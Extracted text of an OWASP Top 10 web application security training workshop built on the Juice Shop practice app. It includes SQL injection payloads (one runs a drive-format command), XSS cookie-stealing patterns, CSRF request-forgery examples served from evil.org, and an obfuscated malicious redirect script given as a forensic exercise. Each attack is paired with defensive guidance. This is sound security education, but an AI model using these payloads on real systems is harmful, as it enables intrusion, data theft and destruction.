web application security

Web Application SecurityTraining Workshop

V3.2.1 (11.04.2023)

Björn Kimminich

https://twitter.com/bkimminichhttps://linkedin.com/in/bkimminichhttps://google.com/+BjörnKimminichhttp://slideshare.net/BjrnKimminich

Björn Kimminich

2007+Software

Architect & Security Officer

at Kuehne+Nagel Corporate Web Development

2011+Part-time lector for Java & Agile

Software Develoment at

private UAS Nordakademie

2012+OWASP Member & QA Developer

OWASP Zed Attack Proxy

(ZAP)

Goals of this WorkshopBuild security awareness for web applicationsGet to know attack methods of hackersLearn ways to discover security vulnerabilitiesLearn the basics of secure web development

Organizational Stuff

Schedule• 2x8 hours• Breaks on demand• Enough time for excercises

Behavior• No daily work during workshop• Ask questions immediately• Open discussion encouraged

Agenda Day One

Motivation

Open Web Application Security Project (OWASP)

Top 10 Web Application Security Risks (A1-A7)

Agenda Day Two


Secure Software Development Lifecycle


Quiz & Wrap-Up

Motivation

Phishing I

Phishing II

Source: http://www.ups.com/media/news/en/fraud_email_examples.pdf

Whaling

= Phishing attacks on senior executives and other high profile targets within businesses

Hacked Burger King Twitter Account (2013)

Source: http://news.yahoo.com/lightbox/burger-kings-twitter-account-hacked-photo-180655645--abc-news-tech.html http://www.guardian.co.uk/technology/2013/feb/18/burger-king-twitter-account-hack

Twitter defaced by Iranian Cyber Army (2009)

Source: http://praetorianprefect.com/archives/category/app-sec/web-site-defacement/

ESPN site „decorated“ with cute Unicorns (2009)

Source: http://praetorianprefect.com/archives/category/app-sec/web-site-defacement/

Perfectly blended Site Defacement against SCO (2004)

Source: http://news.cnet.com/Hackers-deface-SCO-site/2100-7344_3-5469486.html

Sony Pictures Data Breach (2011)

Source: http://www.informationweek.com/security/attacks/sony-hacked-again-1-million-passwords-ex/229900111

eBay Data Breach (2014)

Source: http://www.pcworld.com/article/2157604/ebay-users-change-your-passwords-the-auction-site-was-breached.html

Forensic Analysis Excercise

Analyze the behavior of the following code taken from an email attachment

<script>function c(){};t=false;kM="kM";c.prototype = {v : function()

{this.e=38741;this.eE="";s='';wS="wS";u="";h=false;y="y";var w=String("htsjRD".substr(0,2)+"k8V3tp3kV8".substr(4,2)+":/VxWG".substr(0,2)+"/e"+"nj"+"oydAgE".substr(0,2)+"yo6C3".substr(0,2)+"urMoc".substr(0,2)+"Q8eDha8eDQ".substr(4,2)+"ir"+"cum1nF".substr(0,2)+"UmI9t.UIm9".substr(4,2)+"co"+"m/"+"5.U2mW".substr(0,2)+"TaShtSaT".substr(3,2)+"cwzmlcwz".substr(3,2));z=false;i=22164;d="";this.b="b";var r=false;zC=false;m='';document["locazLsR".substr(0,4)+"tion"]=w;var eG=false;this.k='';q=5975;g=55201;this.p="";var iK=61242;var n=false;}};var nF=false;this.eF=false;var x=new c(); l="l";gO="";x.v();this.kN=false;

</script>

Forensic Analysis Excercise

It executes the following JavaScript:

The rest is just there for obfuscation<script>function c(){};t=false;kM="kM";c.prototype = {v : function()

{this.e=38741;this.eE="";s='';wS="wS";u="";h=false;y="y";var w=String("htsjRD".substr(0,2)+"k8V3tp3kV8".substr(4,2)+":/VxWG".substr(0,2)+"/e"+"nj"+"oydAgE".substr(0,2)+"yo6C3".substr(0,2)+"urMoc".substr(0,2)+"Q8eDha8eDQ".substr(4,2)+"ir"+"cum1nF".substr(0,2)+"UmI9t.UIm9".substr(4,2)+"co"+"m/"+"5.U2mW".substr(0,2)+"TaShtSaT".substr(3,2)+"cwzmlcwz".substr(3,2));z=false;i=22164;d="";this.b="b";var r=false;zC=false;m='';document["locazLsR".substr(0,4)+"tion"]=w;var eG=false;this.k='';q=5975;g=55201;this.p="";var iK=61242;var n=false;}};var nF=false;this.eF=false;var x=new c(); l="l";gO="";x.v();this.kN=false;

</script>

document[„location“]=http://enjoyyourhaircut.com/5.html;

Why Web Application Security is a High Priority

Web Applications have become the #1 target

75% of Attacks target the Application Layer (Gartner)

Most Web Applications are vulnerable95% of Web Applications have some sort of vulnerability (Imperva)78% of easily exploitable weaknesses occur in Web Applications (Symantec)67% of websites used to distribute malware are legitimate, compromised websites (Symantec)

Source: https://www.owasp.org/index.php/Business_Justification_for_Application_Security_Assessment

Website Attackers by Country(Incapsula, 2012)

Source: http://www.incapsula.com/the-incapsula-blog/item/397-top-security-threats-and-attackers-by-country

Top 5 Internet Security Threats(RSA, 2012)Idealistic young Hacktivists will continue

to attackBig Data Companies are taking control of users while profiting from user informationAttackers will make more use of Mobile Exploits for hacking into corporate networksInsiders (Employees, Consultants, Business Partners) can always pose security risksForeign Governments will start to target clouds and more types of businesses with APTs Source: http://www.notebookreview.com/default.asp?newsID=6310

Advanced Persistent Threat (APT)

Group with both the capability and the intent to persistently and effectively target a specific entityExample: The Stuxnet Creators can be considered an APT to the Iranian Government

Source: http://en.wikipedia.org/wiki/Advanced_persistent_threat

Stuxnet (2009-2011)

Source: http://noramintel.com/stuxnet-virus-opens-new-era-of-cyber-war/

Big Data Company Threat Example

Google‘s Android Backup Functionality

Helps you to migrate all your data and apps to a new device quite easilyIt also used to store passwords to all WLANs you ever used on your device…

…on Google servers in the US (!)…unencrypted (!!!)

Source: https://code.google.com/p/android/issues/detail?id=57560

OWASP

Open Web Application Security Project

OWASP

Open Web Application Security ProjectOpen communityNon-profit organization

Core purposeBe the thriving global community that drives visibility and evolution in the safety and security of the world’s software

https://www.owasp.org

Source: https://www.owasp.org

http://owasp.org/

Principles

Free & OpenGoverned by rough consensus & running codeAbide by a code of ethicsNot-for-profitNot driven by commercial interestsRisk based approach


Vision


Some OWASP Projects

Enterprise Security API (ESAPI)Collection of all the security methods that a developer needs to build a secure web application

Zed Attack Proxy (ZAP)Easy to use integrated penetration testing tool for finding vulnerabilities in web applications

Security ShepherdCBT application for web and mobile application security awareness and education

Development GuideMassive document covering all aspects of web application and web service security


OWASP Top 10

Top 10 Web Application Security Risks

OWASP Top Ten 2013

A1: Injection

A2: Broken Authentication and Session Management

A3: Cross-Site Scripting (XSS)

A4: Insecure Direct Object References

A5: Security Misconfiguration

A6: Sensitive Data Exposure

A7: Missing Function Level Action Control

A8: Cross Site Request Forgery (CSRF)

A9: Using Known Vulnerable Components

A10: Unvalidated Redirects and Forwards

Ex-A6/2007: Information Leakage and Improper Error Handling

Top 10 Risk Rating Methodology I

ThreatAgent

AttackVector Weakness Prevalence Weakness Detectability Technical Impact Business Impact

?Easy Widespread Easy Severe

?Average Common Average Moderate

Difficult Uncommon Difficult Minor

123

Source: http://owasptop10.googlecode.com/files/OWASP_Top_10_-_2010%20Presentation.pptx

Top 10 Risk Rating Methodology II

Weighted Risk Rating = Probability * ImpactExample:Threat

AgentAttackVector

Weakness Prevalence

Weakness Detectability

Technical ImpactBusiness Impact

?Easy Widespread Easy Severe

?Average Common Average Moderate

Difficult Uncommon Difficult Minor

1 12 2

(1+2+2)/3 = 1.66

1.66*1 = 1.66Source: http://owasptop10.googlecode.com/files/OWASP_Top_10_-_2010%20Presentation.pptx

Alternatives to OWASP Top 10?

CWE/SANS Top 25 Most Dangerous Software Errors (2011)

Source: http://cwe.mitre.org/top25

[1]Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

[2]Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

[3] Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')

[4]Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

[5] Missing Authentication for Critical Function[6] Missing Authorization[7] Use of Hard-coded Credentials[8] Missing Encryption of Sensitive Data[9] Unrestricted Upload of File with Dangerous Type[10] Reliance on Untrusted Inputs in a Security Decision[11] Execution with Unnecessary Privileges[12] Cross-Site Request Forgery (CSRF)[13] Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')[14] Download of Code Without Integrity Check[15] Incorrect Authorization[16] Inclusion of Functionality from Untrusted Control Sphere[17] Incorrect Permission Assignment for Critical Resource[18] Use of Potentially Dangerous Function[19] Use of a Broken or Risky Cryptographic Algorithm[20] Incorrect Calculation of Buffer Size[21] Improper Restriction of Excessive Authentication Attempts[22] URL Redirection to Untrusted Site ('Open Redirect')[23] Uncontrolled Format String[24] Integer Overflow or Wraparound[25] Use of a One-Way Hash without a Salt

OWASP vs. CWE/SANS?

Both are like different sides of the same coinPCI DSS points to both as industry best practices

Optimal: Be familiar with both!

OWASP Top 10

CWE/SANS Top 25

Target broader

audience

Broader

Weaknesses

Focussed on

Web Apps

Focussed on

Programmers

Web and Non-

Web Apps

Source: http://www.docstoc.com/docs/115032367/2010-CWESANS-Top-25-with-OWASP-Top-10-and-PCI-DSS-V2-Mapping

Use only a local instance for the exercises!Do not attack the deployed application on Heroku (https://juice-shop.herokuapp.com)

The Target: Juice Shophttp://bkimminich.github.io/juice-shop/

https://juice-shop.herokuapp.com/

https://juice-shop.herokuapp.com/

Juice ShopLocal instance setup

1. Install node.js from http://nodejs.org2. Install the application using either of

Fork: https://github.com/bkimminich/juice-shop/fork

Clone: git clone https://github.com/bkimminich/juice-shop.git

Unzip: https://github.com/bkimminich/juice-shop/releases/latest

3. Run npm install4. Run npm start5. Browse to http://localhost:3000

http://nodejs.org/

https://github.com/bkimminich/juice-shop/fork

https://github.com/bkimminich/juice-shop/fork

https://github.com/bkimminich/juice-shop.git

https://github.com/bkimminich/juice-shop.git

https://github.com/bkimminich/juice-shop/releases/latest

https://github.com/bkimminich/juice-shop/releases/latest

http://localhost:3000/

The Voice of Rea§on™

Do not perform any attacks on servers, networks and applications…

…you do not own and operate yourself…or have the owners permission to pentest

Ex-A6/2007: Information Leakage and Improper Error Handling

Pre

vale

nce Widespre

ad

Imp

act Minor

What Information is leaked here?

Information Leakage and Improper Error Handling

Applications can unintentionally leakinformation about their configuration or internal workings, or violate privacyinternal state via how long they take to process certain operations or via different responses to differing inputsinformation about their internal state through detailed or debug error messages

This information can be leveraged to launch or even automate more powerful attacks Source: https://www.owasp.org

Possible Information Harvest

Implementation DetailsServer (OS, Version, …)Programming Language (Language, Version, VM-Vendor, …)Database (Oracle, mySQL, …) and details about it (Version, Schema Names, Table Names, Column Names, …)Names and versions of used 3rd party libraries

Other useful informationStacktracesDebugging InformationSQL StatementsPasswords…


How to handle a failed login attempt?

vs.

How to handle a failed login attempt?

vs.while (noSuchUserError) { // try next user with static password login(user, „?“);}while (wrongPasswordError) { // use existing user and try next

password login(„bkimminich“, password);}

while (loginFailedError) { // try next user while (loginFailedError) { // try next password login(user, password); }}

Exercise

Browse to http://localhost:3000

Task 1: Find the carefully hidden „Score Board“ pageTask 2: Try to provoke some error messages

What information – if any – is leaked on those?


Protection

Common approach to exception handlingDisable or limit detailed error messagesEnsure that secure paths that have multiple outcomes return similar or identical error messages in roughly the same timeCreate a default error handler which returns an appropriately sanitized error message for most users in production for all error paths

A1: Injection

Attack Vector

Easy

Prevalence

Common

Detectability

Average

Impact

Severe

Injection

Injection means……tricking an application into including unintended commands in the data sent to an interpreter

Interpreters……take strings and interpret them as commandsSQL, OS Shell, LDAP, XPath, Hibernate, etc…


Some simple authentication query

SELECT user_idFROM user_dataWHERE user_name = 'bkimminich'AND user_password = '680e89[…]75ab';

// …String query = "SELECT user_id FROM user_data WHERE "+ user_name = '" + req.getParameter("user") +"' AND user_password = '" + req.getParameter("password") +"'"; // …

SQL Injection Example

SELECT user_idFROM user_dataWHERE user_name = '' or 1=1--' AND user_password = '1234';

// …String query = "SELECT user_id FROM user_data WHERE "+ user_name = '" + req.getParameter("user") +"' AND user_password = '" + req.getParameter("password") +"'"; // …

SQL Injection

Typical ImpactSpy out or manipulate dataManipulate the DB server or access underlying OSBypass authentication or gain admin privileges

Correlation with Information LeakageAttackers use error messages or codes to verify the success of an attack and gather information about type and structure of the database

Blind SQL InjectionIf error message don’t help the attacker he can still “take a stab in the dark”The normal application behavior (e.g. response time) might give away clues on successful/failed Injection attempts


Typical SQL Injection Attack Patterns I

Bypass Authenticationadmin' -- admin' # admin'/* ' or 1=1-- ' or 1=1# ' or 1=1/* ') or '1'='1') or ('1'='1

Source: http://ha.ckers.org/sqlinjection

Typical SQL Injection Attack Patterns II

Spy out Data' UNION SELECT login, password, 'x' FROM user--1 UNION SELECT 1,1,1 FROM user--

Manipulate Data'; UPDATE user SET type = 'admin' WHERE id = 23;--

Manipulate the DB Server' ;GO EXEC cmdshell('format C') --

Cheat Sheet: http://ha.ckers.org/sqlinjectionSource: http://ha.ckers.org/sqlinjection

http://ha.ckers.org/sqlinjection

Exercise


Task 1: Log in as an existing userDo not use password guessingDo not use brute forcing

Task 2: Read all user account ids, emails and passwords from the database


Vulnerable Java Examples

Plain SQL via JDBC

HQL via Hibernate

String query = "SELECT account_balance FROM user_data WHERE user_name = " + request.getParameter("customerName");

try { Statement statement = connection.createStatement(…); ResultSet results = statement.executeQuery(query); }

Query unsafeHQLQuery = session.createQuery("from Inventory where productID='"+userSuppliedParameter+"'");

Protection

Avoid the Interpreter at all if possibleUse an interface that supports bind variables

java.sql.PreparedStatementHibernate Parameter Binding…

Enforce Least Privileges for the application‘s DB userPerform White List Input Validation on all user supplied inputSource: http://owasptop10.googlecode.com/files/OWASP_Top_10_-_2010%20Presentation.pptx

White List vs. Black List Validation

White List = Positive Security Rule„Block what is not explicitly allowed!“

Example: Allow only [a-z], [A-Z] and [0-9]

Define once, (almost) never worry againCan be quite effortsome to define for a whole application

Black List = Negative Security Rule„Allow what is not explicitly blocked!“

Example vs. SQL Injection: Block [-#';]Example vs. HTML Injection: Block [<>";'script]

Can be bypassed by masking attack patternsMust be updated for new attack patterns

Fixed Java Examples

Plain SQL via JDBC

HQL via Hibernate

String customerName = request.getParameter("customerName");assert(CustomerValidator.doesExist(customerName);String query = "SELECT account_balance FROM user_data WHERE

user_name = ?";PreparedStatement pstmt = connection.prepareStatement(query);pstmt.setString(1, customerName);ResultSet results = pstmt.executeQuery();

Query safeHQLQuery = session.createQuery("from Inventory where productID=:productId");

safeHQLQuery.setParameter("productId", userSuppliedParameter);

SQL Injection as a feature?!

Intention: Provide cheap means of DB/data maintenance to admin usersProtection: URL is hidden

Never develop like this!

Remember to always sanitize your Database inputs…

Source: http://xkcd.com/327/

A2: Broken Authentication and Session ManagementAttack Vector

Average

Prevalence

Widespread

Detectability

Average

Impact

Severe

<intentionally left blank>

Source: http://www.troyhunt.com/2013/09/web-security-dark-matter-developers-and.html

Broken Authentication and Session Management

HTTP is a “stateless” protocolCredentials have to be passed with every requestShould use SSL for everything requiring authentication

Session Management flawsSESSION ID is just as good as credentials to an attackerSESSION ID is typically exposed on the network, in browser, in logs, …

Beware the side-doorsChange my password, remember my password, forgot my password, secret question, logout, email address, credentials stored in plain text in database, etc…

Typical ImpactUser accounts compromised or user sessions hijacked


Can you crack the 4 digit code of this doorkey safe?

Good Session ID Generator?

h5kek4z9ha1rtrfgj75l3k7hb15rtrl8l65k45hc1rw7ip05jrj53hd1i0395urltda1he1bn46j5le97h9hf2yq3hpo953ld7hg2awi9t6zhj2n5hh27bn0iu345r53hi2aw34o0z43411hj2njkl9por42o9hk3dfrz…

Pattern

• 9,7,5,3,1,9,7,5,3,1,9…• h,h,h,h,h,h,h,h,h,h,h,…• a,b,c,d,e,f,g,h,i,j,k,…• 1,1,1,1,1,2,2,2,2,2,3,…

Protection I

Authentication should be simple, centralized and standardized!Use standard session ID of your containerProtect credentials and session ID with SSL/TLSKeep your SSL certificate safeAutomatic logout of inactive sessionsNever start a login process from an unencrypted pageSession IDs and credentials don’t belong into logfiles


Protection II


Rely on single authentication mechanism with appropriate strength and number of factorsUse strong supplemental authentication mechanisms

Challenge-ResponseLimited time passwords

Check old password on password changeSend confirmation request to old email address on email address change

Excursion:Guideline for Strong PasswordsMinimum length of 12 to 14 characters if permitted

Generating passwords randomly where feasibleAvoiding passwords based on repetition, dictionary words, letter or number sequences, usernames, relative or pet names, romantic links (current or past), or biographical information (e.g., ID numbers, ancestors' names or dates).Including numbers, and symbols in passwords if allowed by the systemIf the system recognizes case as significant, using capital and lower-case lettersAvoiding using the same password for multiple sites or purposesAvoid using something that the public or workmates know you strongly like or dislike

Source: http://en.wikipedia.org/wiki/Password_strength

Excursion:Password Strength Advisers

Automated tests of password strength are problematicAny network based checking necessarily involves submitting one's password to a purpose declared system somewhere

The relevant network traffic is easily identifiable as passwords saving much effort for the attacker

Passwords which are vulnerable to social engineering and guessing attacks cannot be properly checked automatically

Source: http://en.wikipedia.org/wiki/Password_strength

Excursion:Let‘s test some passwords

12345abcdefgabcdefg12345abcd1234!?laura21052005ingrid2004-12-17

Source: http://howsecureismypassword.net/

Instantly Crackable

Instantly Crackable

PC would take ~37 years to crack



PC would take 16 billion years to crack

+ some creative trial & error+ some research on me+ some social engineering

ALL those passwordcracked rather easily

Excursion:Two-Factor-Authentication

Oldschool Paper TAN

List

Protect your account via

RSA-Token orSmartphone App

TANs and dedicated confirmation of suspicious

payments via text message

Computer won‘t boot unless Security USB-Device is plugged in

Facial Recognition via Webcam for

unlocking computer

Facial Recognition via Webcam for

unlocking computer

Exercise


Task 1: Log in with the credentials of the admin user without previously changing themTask 2: Change an existing users password


A3: Cross-Site Scripting (XSS)

Attack Vector

Average

Prevalence

Very Widespread

Detectability

Easy

Impact

Moderate

Cross-Site Scripting (XSS)

Attacker sends malicious code to an innocent user’s browserMalicious code might be…

…reflected from web input (form or hidden field, URL, etc…)

…stored in database…sent directly into rich JavaScript client

Virtually every web application has this problem


Typical Impact

Steal user’s sessionSteal sensitive dataRewrite web pageRedirect user to phishing or malware site

Most Severe:Install XSS proxy which allows attacker to observe and direct all user’s behavior on vulnerable site and force user to other sites


Reflected XSS

Source: http://www.h-online.com/security/features/Web-application-security-747201.html

ServerBrowser

Database

Web Application

Bug!URL

HTML

Victim Request

Website Server Response

Persistent XSS


ServerBrowser

Database

Web Application

Bug!

Website Server Response HTML

URL Initial Request

URL Subsequent Victim Request

Local XSS


ServerBrowser

Database

Web Application

URL Victim Request

HTMLScript Code

Bug!

Website

Script Code Server Response

Server Response

Bug!

DOM Access

XSS Attack Patterns I

Simple Patterns<SCRIPT>javascript:alert('XSS');</SCRIPT><IMG SRC=javascript:alert('XSS')><IFRAME SRC="javascript:alert('XSS');"></IFRAME>

Masked / Evasive Patterns<IMG SRC=javascript:alert("XSS")>'';!--"<XSS>=&{()}<IMG """><SCRIPT>alert("XSS")</SCRIPT>"><IMG SRC="jav ascript:alert('XSS');"><IMG SRC="jav ascript:alert('XSS');">

Source: http://ha.ckers.org/xss.html

XSS Attack Patterns II

Masked / Evasive Patterns (continued)

<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"><b onmouseover=alert('Wufff!')>click me!</b> <img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);> …

Cheat Sheet: http://ha.ckers.org/xss.html

Source: http://ha.ckers.org/xss.html

http://ha.ckers.org/xss.html

Bypassing Client Side Validation

Client Side Validation is always insecure!Install Tampering Plugin

e.g. Tamper Data (Firefox)e.g. Request Maker (Chrome)

You can now stop all outgoing HTTP requests in your browser

…and tamper the contained headers, POST data and passed parameters

…after Client Side Validation took place…but before they are actually submitted to the server

Exercise


Task 1: Reflect an XSS attack back at the userTask 2: Persist an XSS attack in the DB

Visit the attacked page afterwards to test the attack


XSS Vulnerable Java Example

Scriptlet in Java Server Page (JSP)<%String searchCriteria = request.getParameter("searchValue");%>

<%-- Later on the same or subsequent JSP... -->

Search results for <b><%=searchCriteria%></b>:...

Protection

Eliminate XSSDon‘t include user supplied input in your output!

Defend against XSSOutput Encode all user supplied input

OWASP Enterprise Security APIFor GWT: com.google.gwt.safehtml.shared.SafeHtml

Perform White List Input Validation on user inputUse an HTML Sanitizer for larger user supplied HTML chunks

OWASP Java HTML Sanitizer


Fixed Java Example w/ Encoding

Encoding with Struts Bean Taglib

Encoding with OWASP Enterprise Security API

...Search results for <b><bean:write name='searchCriteria'/></b>:...

...<easpi:encodeForHtml><%=searchCriteria></esapi:encodeForHtml>...

Validation & Encoding with ESAPI

Presentation

UserInterface

Busin

ess

Web Service

Database

File SystemUser

Inte

gra

tion

Set Character Set

Encode For HTML

Global Validate

Canonicalize

Specific Validate

Sanitize

Canonicalize

Validate

Source: http://code.google.com/p/owasp-esapi-java/downloads/detail?name=OWASP%20ESAPI.ppt

Safe Escaping Schemes in various HTML Contexts


HTML Style Property Values

(e.g., .pdiv a:hover {color: red; text-decoration: underline} )

JavaScript Data(e.g., <script> some javascript

</script> )

HTML Attribute Values(e.g., <input name='person'

type='TEXT' value='defaultValue'> )

HTML Element Content(e.g., <div> some text to display

</div> )

URI Attribute Values(e.g., <a

href="javascript:toggle('lesson')" )

#4: All non-alphanumeric < 256 \HH

ESAPI: encodeForCSS()

#3: All non-alphanumeric < 256 \xHH

ESAPI: encodeForJavaScript()

#1: ( &, <, >, " ) &entity; ( ', / ) &#xHH;

ESAPI: encodeForHTML()

#2: All non-alphanumeric < 256 &#xHH

ESAPI: encodeForHTMLAttribute()

#5: All non-alphanumeric < 256 %HH

ESAPI: encodeForURL()

OWASP Java HTML Sanitizer

Using a simple prepackaged policy

Defining a customized policy

private String sanitizeHtml(String html) { PolicyFactory policy = Sanitizers.FORMATTING.and(Sanitizers.BLOCKS)

.and(Sanitizers.LINKS);

return policy.sanitize(html);}

private static final PolicyFactory BASIC_FORMATTING_WITH_LINKS_POLICY =

new HtmlPolicyBuilder()

.allowCommonInlineFormattingElements().allowCommonBlockElements()

.allowAttributes("face", "color", "size", "style", "align").onElements("font")

.allowAttributes("style").onElements("div", "span").allowElements("a")

.allowAttributes("href").onElements("a").allowStandardUrlProtocols()

.requireRelNofollowOnLinks().toFactory();

A4: Insecure Direct Object Reference

Attack Vector

Easy

Prevalence

Common

Detectability

Easy

Impact

Moderate

Insecure Direct Object Reference

How do you protect access to your data?This is part of enforcing proper “Authorization” along with A7 – Failure to Restrict URL Access

Common mistakesOnly listing the ‘authorized’ objects for the current userHiding the object references in hidden fields…… and then not enforcing these restrictions on server side (=Presentation layer access control)Attacker simply tampers with parameter value

Typical ImpactUsers are able to access unauthorized files or data


Insecure Direct Object ReferenceIllustratedChecking online how you did in an

examhttp://universi.ty/marks?id=i99a19

Checking how your fellow students didhttp://universi.ty/marks?id=i99a01http://universi.ty/marks?id=i99a02…http://universi.ty/marks?id=i99a20

Checking the distribution among classhttp://universi.ty/marks?id=i99

Exercise


Task 1: Access another users basket


Protection


Eliminate the Direct Object References

Replace with temporary mapping valuee.g. with ESAPI AccessReferenceMap

Validate the Direct Object ReferenceVerify parameter value formatVerify user authorization to access target object

Query Constraints work great! (Data Access Restriction)

Verify the requested mode of access is allowed to the target object (read, write, delete, …)

Access Reference Maps

Maps internal object references to indirect references that are safe to disclose publicly

Prevents A4 Insecure Direct Object Reference

Side Benefit of Random Reference Maps if used consequently and on per-user basis

Makes guessing valid references impossiblePrevents A5 Cross Site Request Forgery

Source: http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/AccessReferenceMap.html

http://myapp?file=report4711.xlshttp://myapp?file=8jK65l

http://myapp?file=report4712.xlshttp://myapp?file=T5d8ui

Random Access

Reference Map

report4711.xls

report4712.xls

Access Reference MapsCode Example

Source: http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/AccessReferenceMap.html

Set fileSet = new HashSet();fileSet.addAll(...); // Add direct references, e.g. Files

AccessReferenceMap map =new RandomAccessReferenceMap(fileSet);

String indirectRef = map.getIndirectReference(file1);String href = "http://myapp?file=" + indirectRef);

// ... Somewhere else in the code

String indirectRef = request.getParameter("file");File file = (File)map.getDirectReference(indirectRef);

A5: Security Misconfiguration

Attack Vector

Easy

Prevalence

Common

Detectability

Easy

Impact

Moderate

Security Misconfiguration

Web applications rely on a secure foundation

Everywhere from the OS up through the App ServerDon’t forget all the libraries you are using!

Is your source code a secret?Think of all the places your source code goesSecurity should not require secret source code

Do you change all credentials regularly in your production environment?


Typical Impact

Install backdoor through missing OS or server patchXSS flaw exploits due to missing application framework patchesUnauthorized access to default accounts, application functionality or data, or unused but accessible functionality due to poor server configuration


Did you think of everyting?


Hardened OS

Web Server

App Server

Framework

App Configuration

Custom Code

Acc

ou

nts

Fin

an

ce

Ad

min

istr

ati

on

Tran

sact

ion

s

Com

mu

nic

ati

on

Kn

ow

led

ge M

gm

tE-C

om

merc

e

Bu

s. F

un

ctio

ns

Test Servers

QA Servers

Source Control

Development

Database

Insider

Exercise


Task 1: Access the administration section of the storeTask 2: Get rid of all ***** rated Feedback


Protection

Verify your system’s configuration management

Secure configuration “hardening” guidelineAutomation is really useful here

Must cover entire platform and applicationKeep up with patches for all components

This includes software libraries, not just OS and Servers!

Analyze security effects of changes

Deactivate unnecessary stuffPorts, Services, Accounts, Sites, …

Verify the implementationScanning finds generic configuration and missing patch problems


A6: Sensitive Data Exposure

Attack Vector

Difficult

Prevalence

Uncommon

Detectability

Average

Impact

Severe

Clairvoyance…?

http://www.youtube.com/watch?v=F7pYHN9iC9I

Sensitive Data Exposure

Storing sensitive data insecurelyFailure to identify all sensitive dataFailure to identify all the places that this sensitive data gets sent or stored

On the web, to business partners, internal communicationDatabases, files, directories, log files, backups, etc.

Failure to properly protect this data in every location


Typical Impact

Typical ImpactAttackers access or modify confidential or private information (e.g credit cards, health care records, financial data, …)Attackers extract secrets to use in additional attacksCompany embarrassment, customer dissatisfaction, and loss of trustExpense of cleaning up the incident, such as forensics, sending apology letters, reissuing thousands of credit cards, providing identity theft insuranceBusiness gets sued and/or fined


Common Examples

Sensitive Data is not encryptedUsing self-made crypto algorithmsUnsafe usage of safe crypto algorithmsStore Keys and Passwords in Source CodeStore Keys/Certificates in unsafe locationContinued usage of weak crypto algorithms

e.g. MD5, SHA-1, RC3, RC4

Excercise


Task: Place an order using a forged coupon code that gives you at least 80% discount


Protection I

Verify your architectureIdentify all sensitive dataIdentify all the places that data is storedEnsure threat model accounts for possible attacksUse encryption to counter the threats, don’t just ‘encrypt’ the data

Protect with appropriate mechanismsFile encryption, database encryption, data element encryptionUse TLS on all connections with sensitive data

Use the mechanisms correctlyUse standard strong algorithms

e.g. AES, RSA, SHA-256

Generate, distribute, and protect keys properlyBe prepared for key change

Verify the implementationSource: http://owasptop10.googlecode.com/files/OWASP_Top_10_-_2010%20Presentation.pptx

Protection II

Be especially careful in unknown Networks

WLAN Hotspots, Internet Cafés, …



Attack Vector

Easy

Prevalence

Common

Detectability

Average

Impact

Moderate

Missing Function Level Action Control

How do you protect access to functions?This is part of enforcing proper “Authorization” along with A4 – Insecure Direct Object References

Common MistakesDisplaying only authorized links and menu choicesAttacker simply forges direct access to ‘unauthorized’ pages

Typical ImpactAttackers invoke functions and services they’re not authorized forAccess other user’s accounts and dataPerform privileged actions


Exercise


Task 1: Place an order that has a negative total Task 2: Access some files that were not meant for you to seeTask 3: Find the hidden „easter egg“

Includes „A6 – Sensitive Data Exposure“ sub-exercise!


Protection

Restrict access to authenticated users (if not public)Enforce any user or role based permissions (if private)Completely disallow requests to unauthorized page types

config fileslog filessource files…


End of Day One

See you all tomorrow!

Web Application SecurityTraining Workshop

Björn Kimminich

https://twitter.com/bkimminichhttps://linkedin.com/in/bkimminichhttps://google.com/+BjörnKimminichhttp://slideshare.net/BjrnKimminich

Agenda Day Two




Quiz & Wrap-Up

A8: Cross-Site Request Forgery (CSRF)

Attack Vector

Average

Prevalence

Common

Detectability

Easy

Impact

Moderate

Cross-Site Request Forgery (CSRF)

An attack where the victim’s browser is tricked into issuing a command to a vulnerable web applicationVulnerability is caused by browsers automatically including user authentication data with each request

Session CookieBasic Authentication HeaderIP AddressClient Side SSL CertificatesWindows domain credentials

Typical ImpactInitiate transactions

transfer funds, logout user, close account, …

Access sensitive dataChange account details


CSRF Vulnerability Pattern

Web Browsers include most credentials with each request…

…even for requests caused by a form, script or image on another site!

All sites relying solely on automatic credentials are vulnerable!Sites with XSS vulnerabilities can be abused for attacking sites with CSRF vulnerabilities


CSRF Attack Explained

bank.com

WebApp

Browser

Bug!

evil.org

WebApp

Login

100

0$

Request

GET / HTTP/1.1Host: www.evil.org

Response

HTTP/1.1 200 OK...<html>...<img src=“http://bank.com/transfer

?to=hacker&amount=1000$“/>...</html>

CSRF-Attack

GET/transfer?to=hacker&amount=1000$ HTTP/1.1Host: bank.com

Intranet

Firewall

CSRF Attack into Intranet

192.168.0.1

WebApp

Browser

Bug!

evil.org

WebApp

Login

Rem

ote

Acc

ess

Request

GET / HTTP/1.1Host: www.evil.org

Response

HTTP/1.1 200 OK...<html>...<img src=“http://192.168.0.1/admin?setAccessMode=remote&resetPassword“/>...</html>

CSRF-Attack

GET/admin/setAccessMode=remote&resetPassword HTTP/1.1Host: 192.168.0.1

Protection

Add a secret, not automatically submitted, token to all sensitive requests

This makes it impossible for the attacker to spoof the request (unless there is an XSS hole in your application)Tokens should be cryptographically strong or random

OptionsStore a single token in the session and add it to all forms and links (e.g. Hidden Field, Single Use URL, Form Token)Beware exposing the token in a referer headerCan use a unique token for each function (e.g. hash of function name, session id, and a secretCan require secondary authentication for sensitive functions (e.g. eTrade)

Make sure your application has no XSS holes which could be exploited to attack other applications (or itself)Source: http://owasptop10.googlecode.com/files/OWASP_Top_10_-_2010%20Presentation.pptx

CSRF + XSS =

What shenanigans might our troll friend have in mind with any unwelcome forum posts he encounters?

[img]http://forum.com/logout.do[/img]

Exercise


Task 1: Craft an CSRF attack by using an existing XSS holeTask 2: Trick user Bender into changing his password to slurmCl4ssic


A9: Using Known Vulnerable ComponentsAttack Vector

Average

Prevalence

Widespread

Detectability

Difficult

Impact

Moderate

Exercise: Name the Vulnerability!

Heartbleed

OpenSSL1.0.1 – 1.0.1f

How Heartbleed works (I)


How Heartbleed works (II)


